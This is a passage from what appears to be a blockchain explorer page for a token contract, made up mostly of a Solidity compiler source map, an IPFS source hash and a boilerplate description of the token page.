:6;5456:71;:::i;:::-;5312:222;;;;:::o;5540:117::-;5649:1;5646;5639:12;5663:180;5711:77;5708:1;5701:88;5808:4;5805:1;5798:15;5832:4;5829:1;5822:15;5849:281;5932:27;5954:4;5932:27;:::i;:::-;5924:6;5920:40;6062:6;6050:10;6047:22;6026:18;6014:10;6011:34;6008:62;6005:88;;;6073:18;;:::i;:::-;6005:88;6113:10;6109:2;6102:22;5892:238;5849:281;;:::o;6136:129::-;6170:6;6197:20;;:::i;:::-;6187:30;;6226:33;6254:4;6246:6;6226:33;:::i;:::-;6136:129;;;:::o;6271:311::-;6348:4;6438:18;6430:6;6427:30;6424:56;;;6460:18;;:::i;:::-;6424:56;6510:4;6502:6;6498:17;6490:25;;6570:4;6564;6560:15;6552:23;;6271:311;;;:::o;6588:117::-;6697:1;6694;6687:12;6728:710;6824:5;6849:81;6865:64;6922:6;6865:64;:::i;:::-;6849:81;:::i;:::-;6840:90;;6950:5;6979:6;6972:5;6965:21;7013:4;7006:5;7002:16;6995:23;;7066:4;7058:6;7054:17;7046:6;7042:30;7095:3;7087:6;7084:15;7081:122;;;7114:79;;:::i;:::-;7081:122;7229:6;7212:220;7246:6;7241:3;7238:15;7212:220;;;7321:3;7350:37;7383:3;7371:10;7350:37;:::i;:::-;7345:3;7338:50;7417:4;7412:3;7408:14;7401:21;;7288:144;7272:4;7267:3;7263:14;7256:21;;7212:220;;;7216:21;6830:608;;6728:710;;;;;:::o;7461:370::-;7532:5;7581:3;7574:4;7566:6;7562:17;7558:27;7548:122;;7589:79;;:::i;:::-;7548:122;7706:6;7693:20;7731:94;7821:3;7813:6;7806:4;7798:6;7794:17;7731:94;:::i;:::-;7722:103;;7538:293;7461:370;;;;:::o;7837:684::-;7930:6;7938;7987:2;7975:9;7966:7;7962:23;7958:32;7955:119;;;7993:79;;:::i;:::-;7955:119;8141:1;8130:9;8126:17;8113:31;8171:18;8163:6;8160:30;8157:117;;;8193:79;;:::i;:::-;8157:117;8298:78;8368:7;8359:6;8348:9;8344:22;8298:78;:::i;:::-;8288:88;;8084:302;8425:2;8451:53;8496:7;8487:6;8476:9;8472:22;8451:53;:::i;:::-;8441:63;;8396:118;7837:684;;;;;:::o;8527:329::-;8586:6;8635:2;8623:9;8614:7;8610:23;8606:32;8603:119;;;8641:79;;:::i;:::-;8603:119;8761:1;8786:53;8831:7;8822:6;8811:9;8807:22;8786:53;:::i;:::-;8776:63;;8732:117;8527:329;;;;:::o;8862:474::-;8930:6;8938;8987:2;8975:9;8966:7;8962:23;8958:32;8955:119;;;8993:79;;:::i;:::-;8955:119;9113:1;9138:53;9183:7;9174:6;9163:9;9159:22;9138:53;:::i;:::-;9128:63;;9084:117;9240:2;9266:53;9311:7;9302:6;9291:9;9287:22;9266:53;:::i;:::-;9256:63;;9211:118;8862:474;;;;;:::o;9342:180::-;9390:77;9387:1;9380:88;9487:4;9484:1;9477:15;9511:4;9508:1;9501:15;9528:320;9572:6;9609:1;9603:4;9599:12;9589:22;;9656:1;9650:4;9646:12;9677:18;9667:81;;9733:4;9725:6;9721:17;9711:27;;9667:81;9795:2;9787:6;9784:14;9764:18;9761:38;9758:84;;9814:18;;:::i;:::-;9758:84;9579:269;9528:320;;;:::o;9854:227::-;9994:34;9990:1;9982:6;9978:14;9971:58;10063:10;10058:2;10050:6;10046:15;10039:35;9854:227;:::o;10087:366::-;10229:3;10250:67;10314:2;10309:3;10250:67;:::i;:::-;10243:74;;10326:93;10415:3;10326:93;:::i;:::-;10444:2;10439:3;10435:12;10428:19;;10087:366;;;:::o;10459:419::-;10625:4;10663:2;10652:9;10648:18;10640:26;;10712:9;10706:4;10702:20;10698:1;10687:9;10683:17;10676:47;10740:131;10866:4;10740:131;:::i;:::-;10732:139;;10459:419;;;:::o;10884:180::-;10932:77;10929:1;10922:88;11029:4;11026:1;11019:15;11053:4;11050:1;11043:15;11070:191;11110:3;11129:20;11147:1;11129:20;:::i;:::-;11124:25;;11163:20;11181:1;11163:20;:::i;:::-;11158:25;;11206:1;11203;11199:9;11192:16;;11227:3;11224:1;11221:10;11218:36;;;11234:18;;:::i;:::-;11218:36;11070:191;;;;:::o;11267:102::-;11309:8;11356:5;11353:1;11349:13;11328:34;;11267:102;;;:::o;11375:848::-;11436:5;11443:4;11467:6;11458:15;;11491:5;11482:14;;11505:712;11526:1;11516:8;11513:15;11505:712;;;11621:4;11616:3;11612:14;11606:4;11603:24;11600:50;;;11630:18;;:::i;:::-;11600:50;11680:1;11670:8;11666:16;11663:451;;;12095:4;12088:5;12084:16;12075:25;;11663:451;12145:4;12139;12135:15;12127:23;;12175:32;12198:8;12175:32;:::i;:::-;12163:44;;11505:712;;;11375:848;;;;;;;:::o;12229:1073::-;12283:5;12474:8;12464:40;;12495:1;12486:10;;12497:5;;12464:40;12523:4;12513:36;;12540:1;12531:10;;12542:5;;12513:36;12609:4;12657:1;12652:27;;;;12693:1;12688:191;;;;12602:277;;12652:27;12670:1;12661:10;;12672:5;;;12688:191;12733:3;12723:8;12720:17;12717:43;;;12740:18;;:::i;:::-;12717:43;12789:8;12786:1;12782:16;12773:25;;12824:3;12817:5;12814:14;12811:40;;;12831:18;;:::i;:::-;12811:40;12864:5;;;12602:277;;12988:2;12978:8;12975:16;12969:3;12963:4;12960:13;12956:36;12938:2;12928:8;12925:16;12920:2;12914:4;12911:12;12907:35;12891:111;12888:246;;;13044:8;13038:4;13034:19;13025:28;;13079:3;13072:5;13069:14;13066:40;;;13086:18;;:::i;:::-;13066:40;13119:5;;12888:246;13159:42;13197:3;13187:8;13181:4;13178:1;13159:42;:::i;:::-;13144:57;;;;13233:4;13228:3;13224:14;13217:5;13214:25;13211:51;;;13242:18;;:::i;:::-;13211:51;13291:4;13284:5;13280:16;13271:25;;12229:1073;;;;;;:::o;13308:281::-;13366:5;13390:23;13408:4;13390:23;:::i;:::-;13382:31;;13434:25;13450:8;13434:25;:::i;:::-;13422:37;;13478:104;13515:66;13505:8;13499:4;13478:104;:::i;:::-;13469:113;;13308:281;;;;:::o;13595:348::-;13635:7;13658:20;13676:1;13658:20;:::i;:::-;13653:25;;13692:20;13710:1;13692:20;:::i;:::-;13687:25;;13880:1;13812:66;13808:74;13805:1;13802:81;13797:1;13790:9;13783:17;13779:105;13776:131;;;13887:18;;:::i;:::-;13776:131;13935:1;13932;13928:9;13917:20;;13595:348;;;;:::o;13949:182::-;14089:34;14085:1;14077:6;14073:14;14066:58;13949:182;:::o;14137:366::-;14279:3;14300:67;14364:2;14359:3;14300:67;:::i;:::-;14293:74;;14376:93;14465:3;14376:93;:::i;:::-;14494:2;14489:3;14485:12;14478:19;;14137:366;;;:::o;14509:419::-;14675:4;14713:2;14702:9;14698:18;14690:26;;14762:9;14756:4;14752:20;14748:1;14737:9;14733:17;14726:47;14790:131;14916:4;14790:131;:::i;:::-;14782:139;;14509:419;;;:::o;14934:180::-;14982:77;14979:1;14972:88;15079:4;15076:1;15069:15;15103:4;15100:1;15093:15;15120:332;15241:4;15279:2;15268:9;15264:18;15256:26;;15292:71;15360:1;15349:9;15345:17;15336:6;15292:71;:::i;:::-;15373:72;15441:2;15430:9;15426:18;15417:6;15373:72;:::i;:::-;15120:332;;;;;:::o;15458:233::-;15497:3;15520:24;15538:5;15520:24;:::i;:::-;15511:33;;15566:66;15559:5;15556:77;15553:103;;15636:18;;:::i;:::-;15553:103;15683:1;15676:5;15672:13;15665:20;;15458:233;;;:::o;15697:224::-;15837:34;15833:1;15825:6;15821:14;15814:58;15906:7;15901:2;15893:6;15889:15;15882:32;15697:224;:::o;15927:366::-;16069:3;16090:67;16154:2;16149:3;16090:67;:::i;:::-;16083:74;;16166:93;16255:3;16166:93;:::i;:::-;16284:2;16279:3;16275:12;16268:19;;15927:366;;;:::o;16299:419::-;16465:4;16503:2;16492:9;16488:18;16480:26;;16552:9;16546:4;16542:20;16538:1;16527:9;16523:17;16516:47;16580:131;16706:4;16580:131;:::i;:::-;16572:139;;16299:419;;;:::o;16724:223::-;16864:34;16860:1;16852:6;16848:14;16841:58;16933:6;16928:2;16920:6;16916:15;16909:31;16724:223;:::o;16953:366::-;17095:3;17116:67;17180:2;17175:3;17116:67;:::i;:::-;17109:74;;17192:93;17281:3;17192:93;:::i;:::-;17310:2;17305:3;17301:12;17294:19;;16953:366;;;:::o;17325:419::-;17491:4;17529:2;17518:9;17514:18;17506:26;;17578:9;17572:4;17568:20;17564:1;17553:9;17549:17;17542:47;17606:131;17732:4;17606:131;:::i;:::-;17598:139;;17325:419;;;:::o;17750:221::-;17890:34;17886:1;17878:6;17874:14;17867:58;17959:4;17954:2;17946:6;17942:15;17935:29;17750:221;:::o;17977:366::-;18119:3;18140:67;18204:2;18199:3;18140:67;:::i;:::-;18133:74;;18216:93;18305:3;18216:93;:::i;:::-;18334:2;18329:3;18325:12;18318:19;;17977:366;;;:::o;18349:419::-;18515:4;18553:2;18542:9;18538:18;18530:26;;18602:9;18596:4;18592:20;18588:1;18577:9;18573:17;18566:47;18630:131;18756:4;18630:131;:::i;:::-;18622:139;;18349:419;;;:::o;18774:177::-;18914:29;18910:1;18902:6;18898:14;18891:53;18774:177;:::o;18957:366::-;19099:3;19120:67;19184:2;19179:3;19120:67;:::i;:::-;19113:74;;19196:93;19285:3;19196:93;:::i;:::-;19314:2;19309:3;19305:12;19298:19;;18957:366;;;:::o;19329:419::-;19495:4;19533:2;19522:9;19518:18;19510:26;;19582:9;19576:4;19572:20;19568:1;19557:9;19553:17;19546:47;19610:131;19736:4;19610:131;:::i;:::-;19602:139;;19329:419;;;:::o;19754:224::-;19894:34;19890:1;19882:6;19878:14;19871:58;19963:7;19958:2;19950:6;19946:15;19939:32;19754:224;:::o;19984:366::-;20126:3;20147:67;20211:2;20206:3;20147:67;:::i;:::-;20140:74;;20223:93;20312:3;20223:93;:::i;:::-;20341:2;20336:3;20332:12;20325:19;;19984:366;;;:::o;20356:419::-;20522:4;20560:2;20549:9;20545:18;20537:26;;20609:9;20603:4;20599:20;20595:1;20584:9;20580:17;20573:47;20637:131;20763:4;20637:131;:::i;:::-;20629:139;;20356:419;;;:::o;20781:222::-;20921:34;20917:1;20909:6;20905:14;20898:58;20990:5;20985:2;20977:6;20973:15;20966:30;20781:222;:::o;21009:366::-;21151:3;21172:67;21236:2;21231:3;21172:67;:::i;:::-;21165:74;;21248:93;21337:3;21248:93;:::i;:::-;21366:2;21361:3;21357:12;21350:19;;21009:366;;;:::o;21381:419::-;21547:4;21585:2;21574:9;21570:18;21562:26;;21634:9;21628:4;21624:20;21620:1;21609:9;21605:17;21598:47;21662:131;21788:4;21662:131;:::i;:::-;21654:139;;21381:419;;;:::o;21806:225::-;21946:34;21942:1;21934:6;21930:14;21923:58;22015:8;22010:2;22002:6;21998:15;21991:33;21806:225;:::o;22037:366::-;22179:3;22200:67;22264:2;22259:3;22200:67;:::i;:::-;22193:74;;22276:93;22365:3;22276:93;:::i;:::-;22394:2;22389:3;22385:12;22378:19;;22037:366;;;:::o;22409:419::-;22575:4;22613:2;22602:9;22598:18;22590:26;;22662:9;22656:4;22652:20;22648:1;22637:9;22633:17;22626:47;22690:131;22816:4;22690:131;:::i;:::-;22682:139;;22409:419;;;:::o

Swarm Source

ipfs://40efb7b7d740682964f784970289e23cae69d721a01ff1a9ef5a6c310866948d
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.